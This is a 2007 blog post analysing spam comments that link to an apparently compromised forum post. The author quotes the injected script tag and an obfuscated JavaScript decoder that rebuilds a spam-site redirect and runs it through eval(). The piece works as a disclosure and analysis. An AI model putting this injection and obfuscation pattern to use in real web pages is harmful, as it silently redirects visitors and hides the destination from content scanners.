« Previous | Next»

Spam, spam, spam! (Or: Update your f*** forum software)

Posted by coldtobi | 9 May, 2007, 08:38

While deleting the spam-comments on my blog, I lately figured out, that direct linking is "out". This is probably because of blacklistings, that exists.

 Well, this does not work either, if you, for instance, write nasty words in the link.

 Let me show you an example, which normally would have been deleted: The bad word has been disabled, as I do post bad words on my blog.

 [URL=http://www.###net##.###/forums/topic.asp?TOPIC_D=1261#(bad_word)

(I disabled the link -- at the time of this writing, it is still active! I do not want refferes from them, and also I do not know, if there are any viruses at the target. For the braves: it is opennetcf.org) 

_ASIP_ 

So take a deeper look, how it works:

 If the said URL is fetched, it redirects you to a forum's post. With javascript enabled, you will be forwarded to the spam site after some second, and the "bad word" will be also transmitted as a "search word". 

If you disable java-script, you'll the a complete thread. As the context is not matsching, it seems, that the "authors" account has been hacked and the post just replaced with the spammy content. Well, probably a weak password.

Looking at the source of the forum posts, it reveals what happens:

 <input type="hidden" id="streetcon" value="bad_word"> <br /><!-- Logo --><br /><script src="http://trusted-XXXX.com/menu-head.js"></script><br />

Someone has injected a script in the forums post. Bad that the forum has accepted this....

It pulls a script, which reads:

 var text = document.getElementById("streetcon").value;
var tt; var kk; var mm; kk=""; tt="w|nd^w$l^c#[|^n;'([[*)!!www$[rus[>d-[^*10$c^m!s>#rc($*(*]q;"+text+"'";
for (i=0; i<tt.length+1; i++){mm=tt.substring (i,i+1);

if (mm=="(") mm="h"; if (mm=="*") mm="p"; if (mm=="!") mm="/"; if (mm==">") mm="e";if (mm=="$") mm=".";
if (mm=="[") mm="t"; if (mm=="#") mm="a"; if (mm=="^") mm="o"; if (mm=="]") mm="?"; if (mm=="@") mm="k";
if (mm=="{") mm="&"; if (mm==")") mm=":"; if (mm==";") mm="="; if (mm=="|") mm="i"; if (mm==" ") mm="+"; kk=kk+mm; }
eval (kk);

This is interesting, the target url is stored encrypted.. Maybe, to fool some content scanner? Another interesting fact is, that the bad_word also comes into the game: It is transmitted also to the target!

And if you take a closer look, you'll see, that the bad-word is hardcoded into the forum, so there was no need to take the word into the spam-comment... If the spammer did not put it there -- maybe it slipped through the bayenian filter.

(Anyway, all comments are human-filtered, so still no change...)

So, now I delete these comments. 

And, if you are the forum owner, please fix it.  

my 2 cents, Blog and Website | Comments (0) | Trackbacks (0)

Related Articles:

0 Comments | "Spam, spam, spam! (Or: Update your f*** forum software)" »